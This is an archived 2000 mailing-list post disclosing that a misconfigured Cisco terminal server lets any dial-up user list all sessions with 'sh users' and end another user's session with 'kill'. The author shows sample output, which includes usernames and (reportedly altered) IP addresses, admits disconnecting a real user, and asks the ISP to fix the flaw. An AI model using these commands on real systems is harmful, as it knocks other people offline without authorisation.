I thought you may be interested in reading.
Date: 10/07/00
Subject: Terminal Server Router, Misconfiguration
Author: Jay Daniels <[EMAIL PROTECTED]>
INTRODUCTION
This is something I found out of pure curiosity. Cisco routers and
terminal servers alike that don't automatically start ppp when you
login allow users to kill other user's processes. In essence, if you
get a prompt when you login with minicom then you are vulnerable to
attack. Thus, can kick anyone offline at will! A malicious user could
easily write a script and run it to kill certain users or all users
except himself of course.
EXPLAINATION
While having trouble signing on recently when tech support changed my
login id, I used minicom (but any dialup terminal program will do) to
connect and see if my account was activated. I had done this many
time before when I just needed to telnet in and check my email,
etc. I decided to learn more about the terminal server commands.
After seeing the kill command, I assume I could only kill my active
telnet connection.
However, I was surpised to learn that I could kill anyone's process!
Thinking that I would get an error instead , I killed a user;( I hope
he dialed back in and didn't notice. Then I killed myself (not
really;), my modem died.
I'm not a cisco/router expert, but there should be a way to stop users
from using deadly commands, like kill! Also, since the EXEC users
allows one to retrive the process id of current users, this should
also be restricted.
EXAMPLE
dialup to terminal
username: jay
password: ************
PROMT>sh users #sh is short for show
I Session Line: Slot: Tx Rx Service Host User
O ID Chan Port Data Rate Type[mpID] Address Name
I 273782311 2:14 3:11 42667 24000 PPP 209.229.99.184 nononz
I 273782362 2:7 3:6 46667 24000 PPP 209.229.99.171 ddeane2
I 273782361 2:15 4:1 48000 21600 PPP 209.229.99.170
morrishill
I 273782378 1:12 4:14 45333 26400 PPP 209.229.99.188 nyx1
I 273782375 1:6 4:13 49333 24000 PPP 209.229.99.185 tonnie
I 273782368 2:3 5:4 44000 16800 PPP 209.229.99.177 allenh
I 273782364 1:18 3:5 37333 24000 PPP 209.229.99.173 gmcdaniel
I 273782365 1:13 4:3 46667 21600 PPP 209.229.99.174 joe
I 273782345 1:17 4:12 45333 16800 PPP 209.229.99.154 jmoore537
I 273782366 2:1 3:13 40000 24000 PPP 209.229.99.175
freddurden
I 273782343 1:1 5:2 48000 26400 PPP 209.229.99.152 donmoore
I 273782349 1:22 4:15 34667 14400 PPP 209.229.99.158 dinky100
I 273782367 2:21 5:9 49333 26400 PPP 209.229.99.176 drewmcd
I 273782380 1:16 4:9 28800 28800 PPP 209.229.99.190 amjam
I 273782377 2:23 5:11 24000 19200 PPP 209.229.99.187 gadget
I 273782371 2:8 5:14 42667 19200 PPP 209.229.99.180 jbruno
I 273782379 2:12 3:10 28800 24000 PPP 209.229.99.189 lawhon
I 273782381 1:7 3:3 45333 26400 Termsrv N/A jay
PROMT>kill 273782365
Process killed... #or something like that.
PROMT>sh users #sh is short for show users to get process id.
I Session Line: Slot: Tx Rx Service Host User
O ID Chan Port Data Rate Type[mpID] Address Name
I 273782311 2:14 3:11 42667 24000 PPP 209.229.99.184 nononz
I 273782362 2:7 3:6 46667 24000 PPP 209.229.99.171 ddeane2
I 273782361 2:15 4:1 48000 21600 PPP 209.229.99.170
morrishill
I 273782378 1:12 4:14 45333 26400 PPP 209.229.99.188 nyx1
I 273782375 1:6 4:13 49333 24000 PPP 209.229.99.185 tonnie
I 273782368 2:3 5:4 44000 16800 PPP 209.229.99.177 allenh
I 273782364 1:18 3:5 37333 24000 PPP 209.229.99.173 gmcdaniel
I 273782345 1:17 4:12 45333 16800 PPP 209.229.99.154 jmoore537
I 273782366 2:1 3:13 40000 24000 PPP 209.229.99.175
freddurden
I 273782343 1:1 5:2 48000 26400 PPP 209.229.99.152 donmoore
I 273782349 1:22 4:15 34667 14400 PPP 209.229.99.158 dinky100
I 273782367 2:21 5:9 49333 26400 PPP 209.229.99.176 drewmcd
I 273782380 1:16 4:9 28800 28800 PPP 209.229.99.190 amjam
I 273782377 2:23 5:11 24000 19200 PPP 209.229.99.187 gadget
I 273782371 2:8 5:14 42667 19200 PPP 209.229.99.180 jbruno
I 273782379 2:12 3:10 28800 24000 PPP 209.229.99.189 lawhon
I 273782381 1:7 3:3 45333 26400 Termsrv N/A jay
* note: ip's have been changed
RESULTS
I killed *joe! He is no longer logged in. Ok, since I have no
business killing users processes or getting killed, can you fix this
problem?
Before you do, consider the following...
I use infoave.net because it works great and I can login with
Windows3.1/95/98/NT and Linux. I hope we do not lose any functionality.
For this very reason I considered not sending you this document; but, with
further consideration I though you should know. Try the above commands
yourself dialup with terminal and login as a normal user.
I'm just a hippie stuck in the Seventies with nothing better to do,
but surf the web;)
Jay Daniels ----------------------------------
,_, mailto:[EMAIL PROTECTED]
(O,O) http://web.infoave.net/~jay
( ) 76B1 A850 6F40 2A25 0BE6 378E CDC9 6408
-"-"------------------------------------------
----
post: [EMAIL PROTECTED]
url: http://theMezz.com/informant
forum: http://theMezz.com/bbs
subscribe: [EMAIL PROTECTED]
unsubscribe: [EMAIL PROTECTED]
digest: [EMAIL PROTECTED]
notDigest: [EMAIL PROTECTED]
___________________________________________________________
T O P I C A The Email You Want. http://www.topica.com/t/16
Newsletters, Tips and Discussions on Your Favorite Topics
